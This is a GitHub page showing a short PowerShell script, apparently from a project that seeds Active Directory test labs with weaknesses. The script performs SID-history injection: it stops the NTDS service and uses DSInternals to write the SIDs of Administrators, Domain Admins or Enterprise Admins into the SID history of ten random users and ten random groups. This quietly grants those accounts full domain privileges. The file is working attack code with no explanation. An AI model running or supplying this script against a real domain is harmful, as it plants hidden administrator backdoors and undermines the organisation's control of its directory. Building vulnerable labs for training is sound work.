-
-
Notifications
You must be signed in to change notification settings - Fork 283
/
Copy pathSIDHistory_dsinternals.ps1
36 lines (31 loc) · 1.51 KB
/
SIDHistory_dsinternals.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#if the dsinternals module exists perform some sidhistory attacks
#Install-Module DSInternals -Force
if (Get-Module -ListAvailable -Name dsinternals) {
$users=(get-aduser -filter *)| get-random -count 10
$groups=(get-adgroup -filter *)| get-random -count 10
$administrators = get-adgroup administrators
$domadmins = get-adgroup 'domain admins'
$entadmins = get-adgroup 'enterprise admins'
stop-service ntds -force
$users|%{
$rando = 1..3|get-random
if ($rando -eq 1){
Add-ADDBSidHistory -samaccountname $_.samaccountname -sidhistory $administrators.sid -DBPath c:\windows\ntds\ntds.dit
}elseif($rando -eq 2){
Add-ADDBSidHistory -samaccountname $_.samaccountname -sidhistory $domadmins.sid -DBPath c:\windows\ntds\ntds.dit
}else{
Add-ADDBSidHistory -samaccountname $_.samaccountname -sidhistory $entadmins.sid -DBPath c:\windows\ntds\ntds.dit
}
}
$groups|%{
$rando = 1..3|get-random
if ($rando -eq 1){
Add-ADDBSidHistory -samaccountname $_.samaccountname -sidhistory $administrators.sid -DBPath c:\windows\ntds\ntds.dit
}elseif($rando -eq 2){
Add-ADDBSidHistory -samaccountname $_.samaccountname -sidhistory $domadmins.sid -DBPath c:\windows\ntds\ntds.dit
}else{
Add-ADDBSidHistory -samaccountname $_.samaccountname -sidhistory $entadmins.sid -DBPath c:\windows\ntds\ntds.dit
}
}
start-service ntds
}